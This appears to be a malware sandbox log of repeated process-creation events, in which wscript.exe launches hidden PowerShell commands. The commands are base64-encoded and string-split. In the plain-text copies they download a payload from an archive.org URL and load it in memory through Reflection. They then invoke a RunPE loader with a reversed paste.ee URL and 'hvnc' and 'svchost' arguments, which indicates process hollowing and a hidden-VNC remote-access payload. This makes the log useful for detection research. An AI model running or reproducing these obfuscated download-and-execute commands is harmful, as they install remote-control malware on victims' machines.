Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe 